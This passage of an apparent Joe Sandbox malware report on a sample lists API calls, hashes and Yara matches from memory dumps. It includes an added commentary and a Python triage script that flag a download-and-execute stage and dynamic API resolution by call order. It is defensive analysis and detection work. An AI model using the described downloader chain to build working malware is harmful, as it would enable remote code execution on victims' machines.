• Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
• Instruction Fuzzy Hash: E481737230D0B34AEB294679943843FFFE15A523A135A079FD4F2CA2C1EE188A64D624

Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
• Instruction ID: e5c583b9e42432bcbcce1d8c06ee20fb03f0bd12f5c2ea791361366529730c3b
• Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
• Instruction Fuzzy Hash: 738132732080A349EB6B463984740BFFFF15E821A630A079FD4F2CA2C5EE148265D630

Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
• Instruction ID: e183cc42c0575e46eff71331dfd644b760227977963c57612164f9205c38e507
• Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
• Instruction Fuzzy Hash: 631138773030B1A3D604862DF8B46BFA395EBE63217EC426FC0424B748CE6AE9C1950C

Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
• Instruction ID: c76349d59dff7fe9183b9445d4fef866c30eb5f162c9bd02aa940add7f0fda4c
• Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
• Instruction Fuzzy Hash: AE11C477200042479E5B8A3ED8B46FBE79EEEC6228B2D567BD0414B758D322E145D620

Memory Dump Source
• Source File: 00000000.00000002.3744559508.0000000000A09000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A09000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a09000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
• Instruction ID: 084d187eecf8f6a5e7fba0351dd8ea94db7fdb91763d15ff6fb101facb45fcb8
• Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
• Instruction Fuzzy Hash: D8118E72380104AFDB44DF55EC91FA773EAEB88320B298165ED08CB356E675EC01C760

Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
• Instruction ID: 316fab75cdca8c204f77335740380c5cf636f58c06b371094cabf143150724a7
• Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
• Instruction Fuzzy Hash: 0301D676A106048FDF21CF24C904BAB37F9FB86216F4555B6D90AD7381E774A941CB90

APIs
• DefWindowProcW.USER32(?,00000014,?,?), ref: 00402135
• GetClientRect.USER32(?,?), ref: 0040214A
• GetDC.USER32(?), ref: 00402151
• CreateSolidBrush.GDI32(00646464), ref: 00402164
• SelectObject.GDI32(00000000,00000000), ref: 00402178
• CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402183
• SelectObject.GDI32(00000000,00000000), ref: 00402191
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021A4
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021AF
• MulDiv.KERNEL32(00000008,00000000), ref: 004021B8
• CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021DC
• SelectObject.GDI32(00000000,00000000), ref: 004021EA
• SetBkMode.GDI32(?,00000001), ref: 00402267
• SetTextColor.GDI32(?,00000000), ref: 00402276
• _wcslen.LIBCMT ref: 0040227F
Strings
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
• String ID: Tahoma
• API String ID: 3832963559-3580928618
• Opcode ID: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
                                                                                                                                                                                                                                                                          • Instruction ID: 7336700d8ad07cb9e45a564d019af9580db2992b46b3f32d80e0fb6f80206702
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3710D72900228AFDB22DF64DD85FAEBBBCEF09751F0041A5B609E6155DA74AF80CF14
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 004025CD
                                                                                                                                                                                                                                                                          • DefWindowProcW.USER32(?,00000204,?,?), ref: 004025DF
                                                                                                                                                                                                                                                                          • ReleaseCapture.USER32 ref: 004025F2
                                                                                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 00402619
                                                                                                                                                                                                                                                                          • CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026A0
                                                                                                                                                                                                                                                                          • CreateCompatibleDC.GDI32(?), ref: 004026A9
                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 004026B3
                                                                                                                                                                                                                                                                          • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026E1
                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 004026EA
                                                                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 004026FC
                                                                                                                                                                                                                                                                          • GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402717
                                                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 00402731
                                                                                                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 00402738
                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 0040273F
                                                                                                                                                                                                                                                                          • ReleaseDC.USER32(00000000,?), ref: 0040274D
                                                                                                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 00402754
                                                                                                                                                                                                                                                                          • SetCapture.USER32(?), ref: 004027A1
                                                                                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 004027D5
                                                                                                                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 004027EB
                                                                                                                                                                                                                                                                          • GetKeyState.USER32(0000001B), ref: 004027F8
                                                                                                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 0040280D
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
                                                                                                                                                                                                                                                                          • String ID: gya
                                                                                                                                                                                                                                                                          • API String ID: 2545303185-1989253062
                                                                                                                                                                                                                                                                          • Opcode ID: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
                                                                                                                                                                                                                                                                          • Instruction ID: a73b2935a0a3d6b8847c17f141a4fcfbdcbb362899817371daa4de44eaa4c7d1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1761A4B5900219AFCB249F64DD48BAA7BB9FF49706F004179F605A62A2D7B4C941CF1C
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free$Info
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2509303402-0
                                                                                                                                                                                                                                                                          • Opcode ID: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
                                                                                                                                                                                                                                                                          • Instruction ID: 2b0db881b533507aa5a5d3a35fa702b665ff2bbaed3809dcc6a19b45feaeb0d0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1B1DFB1A002159FEB11DF6AD881BEEBBF5FF08304F54446FE485A7342D779A9418B24
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free$Info
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2509303402-0
                                                                                                                                                                                                                                                                          • Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                                                                                                                                                                                                                          • Instruction ID: 7470ea8a20f3ebfb693555afe86e06abf961ee06afc84aeba07f5b0c9472dc93
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1B1AE71A002099FDB62DF69C880BEFBBF5BF49304F64416EE499A7341DB75A841CB60
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 0043A63C
                                                                                                                                                                                                                                                                            • Part of subcall function 0043998B: _free.LIBCMT ref: 004399A8
                                                                                                                                                                                                                                                                            • Part of subcall function 0043998B: _free.LIBCMT ref: 004399BA
                                                                                                                                                                                                                                                                            • Part of subcall function 0043998B: _free.LIBCMT ref: 004399CC
                                                                                                                                                                                                                                                                            • Part of subcall function 0043998B: _free.LIBCMT ref: 004399DE
                                                                                                                                                                                                                                                                            • Part of subcall function 0043998B: _free.LIBCMT ref: 004399F0
                                                                                                                                                                                                                                                                            • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A02
                                                                                                                                                                                                                                                                            • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A14
                                                                                                                                                                                                                                                                            • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A26
                                                                                                                                                                                                                                                                            • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A38
                                                                                                                                                                                                                                                                            • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A4A
                                                                                                                                                                                                                                                                            • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A5C
                                                                                                                                                                                                                                                                            • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A6E
                                                                                                                                                                                                                                                                            • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A80
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0043A631
                                                                                                                                                                                                                                                                            • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                                                            • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0043A653
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0043A668
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0043A673
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0043A695
• _free.LIBCMT ref: 0043A6A8
• _free.LIBCMT ref: 0043A6B6
• _free.LIBCMT ref: 0043A6C1
• _free.LIBCMT ref: 0043A6F9
• _free.LIBCMT ref: 0043A700
• _free.LIBCMT ref: 0043A71D
• _free.LIBCMT ref: 0043A735
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
• Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
• Instruction ID: f5f6d892b7e162680270ba0694072865b062da135816e678cf6525fe08cd79ed
• Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
• Instruction Fuzzy Hash: E6318B716006009FEB21AF3AD846B5773E8FF18315F18A41FE499C6251DB39ED608B1A

APIs
• ___free_lconv_mon.LIBCMT ref: 024CA8A3
  • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9C0F
  • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9C21
  • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9C33
  • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9C45
  • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9C57
  • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9C69
  • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9C7B
  • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9C8D
  • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9C9F
  • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9CB1
  • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9CC3
  • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9CD5
  • Part of subcall function 024C9BF2: _free.LIBCMT ref: 024C9CE7
• _free.LIBCMT ref: 024CA898
  • Part of subcall function 024C36D1: HeapFree.KERNEL32(00000000,00000000,?,024CA35F,?,00000000,?,00000000,?,024CA603,?,00000007,?,?,024CA9F7,?), ref: 024C36E7
  • Part of subcall function 024C36D1: GetLastError.KERNEL32(?,?,024CA35F,?,00000000,?,00000000,?,024CA603,?,00000007,?,?,024CA9F7,?,?), ref: 024C36F9
• _free.LIBCMT ref: 024CA8BA
• _free.LIBCMT ref: 024CA8CF
• _free.LIBCMT ref: 024CA8DA
• _free.LIBCMT ref: 024CA8FC
• _free.LIBCMT ref: 024CA90F
• _free.LIBCMT ref: 024CA91D
• _free.LIBCMT ref: 024CA928
• _free.LIBCMT ref: 024CA960
• _free.LIBCMT ref: 024CA967
• _free.LIBCMT ref: 024CA984
• _free.LIBCMT ref: 024CA99C
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
• Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
• Instruction ID: 4172addc0a296edae16ff608617903e37be4f25d1e727db2fdbd0689dff5eb02
• Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
• Instruction Fuzzy Hash: 90318A396042189BEBB4AF3ED840B5BB7E9AF00754F31886FE449D6650DB70A8508BA4

APIs
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
• Instruction ID: 5833a6d57b494697f4826b29985624930ca7ec9e215e7e0b09aa607084295bdd
• Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
• Instruction Fuzzy Hash: 2CC15372E40205BBEB20DBA8CD43FEF77B8AB58704F15515AFA04FB282D6B49D418B54

APIs
• InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02492C7E
• InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 02492C94
• GetTempPathW.KERNEL32(00000105,?), ref: 02492CB0
• GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 02492CC6
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 02492CFF
• InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 02492D3B
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02492D58
• ShellExecuteExW.SHELL32(?), ref: 02492DCF
• WaitForSingleObject.KERNEL32(?,00008000), ref: 02492DE4
Strings
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
• String ID: <
• API String ID: 838076374-4251816714
• Opcode ID: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
• Instruction ID: 87599a9e4dd94e7c45227a6dc8abfde4c5174a8f5a71db35cd1dcf5b97c66825
• Opcode Fuzzy Hash: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
• Instruction Fuzzy Hash: 9F41407194021DAEEB20DF649C85FEA7BBCFF05745F0081EAA545E2150DFB09E858FA4

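The nine calls listed for the function at 02492C7E are, in order, a complete download-and-execute stage: open a WinINet session and a URL, create a file in %TEMP% (GetTempPathW, GetTempFileNameW, CreateFileW with GENERIC_WRITE and CREATE_ALWAYS), copy the response into it in 0x400-byte reads, launch it with ShellExecuteExW and wait on the resulting handle. The order of the calls, not any single API, is what makes this function worth a look. The script below is an added example, not part of the Joe Sandbox report and not code from the sample: it parses API lines in the format this report prints under "APIs" and checks the call order against two patterns, the downloader stage above and the LoadLibraryW/GetProcAddress chain against advapi32.dll in the next record on this page. The report lines are copied from those two records (argument lists shortened in the second); the pattern definitions, the constructed benign sample and its addresses, and the one constructed "Part of subcall function" line are this example's own assumptions.

```python
"""Triage of Joe Sandbox per-function API lists by ordered call pattern.

Added example, not part of the Joe Sandbox report: parse the "APIs" lines the
report prints for one function, then test whether the direct calls realise a
pattern in order (gaps allowed) and return the ref: addresses of the matching
calls so an analyst can jump to them in the snapshot.
"""
from typing import Dict, List, Optional, Sequence, Tuple

# Report lines copied from the download-and-execute record on this page.
DOWNLOAD_EXEC_LINES = [
    "• InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02492C7E",
    "• InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 02492C94",
    "• GetTempPathW.KERNEL32(00000105,?), ref: 02492CB0",
    "• GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 02492CC6",
    "• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 02492CFF",
    "• InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 02492D3B",
    "• WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02492D58",
    "• ShellExecuteExW.SHELL32(?), ref: 02492DCF",
    "• WaitForSingleObject.KERNEL32(?,00008000), ref: 02492DE4",
]

# Report lines copied from the advapi32.dll resolver record on this page
# (argument lists shortened).  The subcall line is CONSTRUCTED to show that
# nested callee entries are skipped.
DYNAMIC_RESOLVE_LINES = [
    "• LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064), ref: 024AEEF9",
    "• GetLastError.KERNEL32(?), ref: 024AEF05",
    "• LoadLibraryW.KERNEL32(advapi32.dll,?), ref: 024AEF15",
    "• GetProcAddress.KERNEL32(00000000,00447430), ref: 024AEF2B",
    "  • Part of subcall function 00401000: HeapFree.KERNEL32(00000000,00000000), ref: 00401010",
    "• GetProcAddress.KERNEL32(00000000,00000000), ref: 024AEF41",
    "• GetProcAddress.KERNEL32(00000000,00000000), ref: 024AEF58",
]

# CONSTRUCTED benign-looking function: writes and launches a temp file but
# never fetches anything, so the downloader pattern must not fire.
BENIGN_LINES = [
    "• GetTempPathW.KERNEL32(00000105,?), ref: 00401000",
    "• CreateFileW.KERNEL32(?,40000000), ref: 00401020",
    "• WriteFile.KERNEL32(?), ref: 00401040",
    "• ShellExecuteExW.SHELL32(?), ref: 00401060",
]

# Ordered patterns (assumed by this example): each name must follow the
# previous one in the function's direct call list; other calls may sit between.
PATTERNS: Dict[str, Sequence[str]] = {
    # remote fetch -> local file -> execute
    "download_and_execute": (
        "InternetOpenUrlW", "InternetReadFile", "WriteFile", "ShellExecuteExW"),
    # module load followed by repeated GetProcAddress: imports resolved at run time
    "dynamic_api_resolution": (
        "LoadLibraryW", "GetProcAddress", "GetProcAddress", "GetProcAddress"),
}


def parse_api_lines(lines: Sequence[str]) -> List[Tuple[str, str]]:
    """Return (api_name, ref_address) for each direct call, in report order.

    'Part of subcall function' lines describe a callee, not this function,
    and are skipped so they cannot satisfy or break the call order.
    """
    calls: List[Tuple[str, str]] = []
    for raw in lines:
        text = raw.strip().lstrip("•").strip()
        if not text or text.startswith("Part of subcall function"):
            continue
        name = text.split(".", 1)[0]            # 'Name.MODULE(...)' -> 'Name'
        ref = text.rsplit("ref:", 1)[1].strip() if "ref:" in text else ""
        calls.append((name, ref))
    return calls


def match_ordered(pattern: Sequence[str], calls: Sequence[Tuple[str, str]]) -> Optional[List[str]]:
    """Refs of the calls that realise `pattern` in order, or None if absent."""
    refs: List[str] = []
    pos = 0
    for wanted in pattern:
        while pos < len(calls) and calls[pos][0] != wanted:
            pos += 1
        if pos == len(calls):
            return None
        refs.append(calls[pos][1])
        pos += 1
    return refs


def classify(lines: Sequence[str]) -> Dict[str, List[str]]:
    """Map each matching pattern name to the refs of the calls that matched."""
    calls = parse_api_lines(lines)
    hits: Dict[str, List[str]] = {}
    for label, pattern in PATTERNS.items():
        refs = match_ordered(pattern, calls)
        if refs is not None:
            hits[label] = refs
    return hits


if __name__ == "__main__":
    for title, sample in (("downloader", DOWNLOAD_EXEC_LINES),
                          ("resolver", DYNAMIC_RESOLVE_LINES),
                          ("benign", BENIGN_LINES)):
        print(title, classify(sample))
```

The refs returned for the downloader are the sandbox's own `ref:` addresses in the 02490000 dump, which the report marks "based on PE: false": this is unpacked code, so those addresses exist only in the snapshot file named under "Joe Sandbox IDA Plugin", not in the sample on disk.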
APIs
• LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,024AF228,00000004,024A7D87,00000004,024A8069), ref: 024AEEF9
• GetLastError.KERNEL32(?,024AF228,00000004,024A7D87,00000004,024A8069,?,024A8799,?,00000008,024A800D,00000000,?,?,00000000,?), ref: 024AEF05
• LoadLibraryW.KERNEL32(advapi32.dll,?,024AF228,00000004,024A7D87,00000004,024A8069,?,024A8799,?,00000008,024A800D,00000000,?,?,00000000), ref: 024AEF15
• GetProcAddress.KERNEL32(00000000,00447430), ref: 024AEF2B
• GetProcAddress.KERNEL32(00000000,00000000), ref: 024AEF41
• GetProcAddress.KERNEL32(00000000,00000000), ref: 024AEF58
• GetProcAddress.KERNEL32(00000000,00000000), ref: 024AEF6F
• GetProcAddress.KERNEL32(00000000,00000000), ref: 024AEF86
• GetProcAddress.KERNEL32(00000000,00000000), ref: 024AEF9D
Strings
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                          • String ID: advapi32.dll
                                                                                                                                                                                                                                                                          • API String ID: 2340687224-4050573280
                                                                                                                                                                                                                                                                          • Opcode ID: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
                                                                                                                                                                                                                                                                          • Instruction ID: 5094c6e2bcea075d3313d2a7846d9035d3d1bbbe03e89dfc1d5aca356291f4ab
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A72181B1904711BFE7106FB49C08A5ABFA8EF19B16F004A2BF556E3600CBBC94418FA4
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,024AF228,00000004,024A7D87,00000004,024A8069), ref: 024AEEF9
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,024AF228,00000004,024A7D87,00000004,024A8069,?,024A8799,?,00000008,024A800D,00000000,?,?,00000000,?), ref: 024AEF05
                                                                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(advapi32.dll,?,024AF228,00000004,024A7D87,00000004,024A8069,?,024A8799,?,00000008,024A800D,00000000,?,?,00000000), ref: 024AEF15
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00447430), ref: 024AEF2B
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 024AEF41
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 024AEF58
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 024AEF6F
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 024AEF86
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 024AEF9D
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                          • String ID: advapi32.dll
                                                                                                                                                                                                                                                                          • API String ID: 2340687224-4050573280
                                                                                                                                                                                                                                                                          • Opcode ID: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
                                                                                                                                                                                                                                                                          • Instruction ID: 67b99fa2203f2466764ca8cb5f16755750311b1da076590b33f09902df0306e7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 172192B1904711BFE7106F749C08A5ABFECEF09B16F004A2BF556D3600CBBC94418BA8
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,024A670B), ref: 024A24B6
